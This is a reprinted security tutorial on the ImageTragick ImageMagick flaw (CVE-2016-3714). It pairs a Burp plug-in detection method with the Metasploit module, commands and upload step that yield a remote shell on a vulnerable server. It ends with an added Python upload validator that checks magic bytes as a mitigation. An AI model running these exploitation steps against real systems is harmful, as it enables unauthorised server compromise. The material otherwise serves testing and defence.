Reprinted from: https://www.secpulse.com/archives/57126.html
ImageTragick (CVE-2016-3714)
ImageMagick is a widely used image-processing component with bindings for popular languages such as PHP, Java, Python, Perl and Ruby. In April 2016 a remote code execution (RCE) vulnerability was found in it: an attacker only has to upload a crafted image to gain privileges on the server. See the SecPulse advisory <ImageMagick remote command execution vulnerability (CVE-2016-3714) security alert>: https://www.secpulse.com/archives/45833.html
(Further reading: ImageMagick execution flow, vulnerability analysis and fix, http://www.freebuf.com/vuls/104048.html)
The traditional way to detect this vulnerability is to generate a payload and then watch for the DNS resolution record on a third-party website, which is time-consuming and inconvenient. This post introduces a quicker way to detect and exploit it.
First you need a Burp plug-in called burp-image-size:
https://github.com/silentsignal/burp-image-size/releases/download/v0.3/burp-image-size-v0.3-java1.6.jar (pay attention to the runtime environment when installing it).
When uploading an image, capture the request and choose Send to active scan so the plug-in scans the upload point. If the vulnerability exists it is reported in red as a high-risk finding, and detection is complete.
Next, use Metasploit to get a shell.
use exploit/unix/fileformat/imagemagick_delegate
show options to check the module options.
I keep the default configuration here, then run exploit -j, which generates msf.png.
Upload the image, and a session connection is returned.
Use sessions -i 1 to interact with the session.
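The upload point that the scanner flags is also where the defence belongs: the published mitigation for this bug is to verify an uploaded file's magic bytes before ImageMagick ever sees it (together with restricting coders in policy.xml, covered in the FreeBuf article referenced above). The following is an added example, not code from the original post; it assumes the endpoint only needs to accept PNG, JPEG and GIF, and the sample inputs are constructed.

```python
# Leading bytes of the raster formats the upload endpoint is willing to accept.
# ImageMagick picks its coder from these leading bytes, not from the file
# extension, so checking them decides which coder will actually run on the file.
RASTER_MAGIC = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Allowed extensions mapped onto the format family they claim to be.
EXT_FAMILY = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif"}


def sniff_format(data: bytes):
    """Return the raster family the leading bytes identify, or None."""
    for family, magics in RASTER_MAGIC.items():
        if any(data.startswith(m) for m in magics):
            return family
    return None


def validate_upload(data: bytes, filename: str):
    """Decide whether an uploaded file may be handed to ImageMagick.

    Returns (accepted, reason). A file is accepted only when its extension is
    allowed AND its content starts with the magic bytes of that same format,
    so a text-based vector document renamed to .png is rejected up front.
    """
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    declared = EXT_FAMILY.get(ext)
    if declared is None:
        return False, f"extension '{ext}' is not an allowed raster format"
    actual = sniff_format(data)
    if actual is None:
        return False, "content does not start with a known raster magic"
    if actual != declared:
        return False, f"extension claims {declared} but content is {actual}"
    return True, f"{actual} magic matches extension"


if __name__ == "__main__":
    # Constructed samples, not real uploads: a PNG header, a GIF header, and
    # an XML vector document renamed to look like a PNG.
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    gif = b"GIF89a" + b"\x00" * 16
    disguised = b'<?xml version="1.0"?><svg xmlns="http://www.w3.org/2000/svg"/>'
    for name, blob in (("a.png", png), ("b.gif", gif), ("c.png", disguised), ("d.gif", png)):
        print(name, validate_upload(blob, name))
```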
Reference links:
http://www.freebuf.com/vuls/104048.html
http://www.mottoin.com/89312.html
https://www.rapid7.com/db/modules/exploit/unix/fileformat/imagemagick_delegate
How to use Burp + Metasploit to quickly detect and exploit ImageTragick (CVE-2016-3714)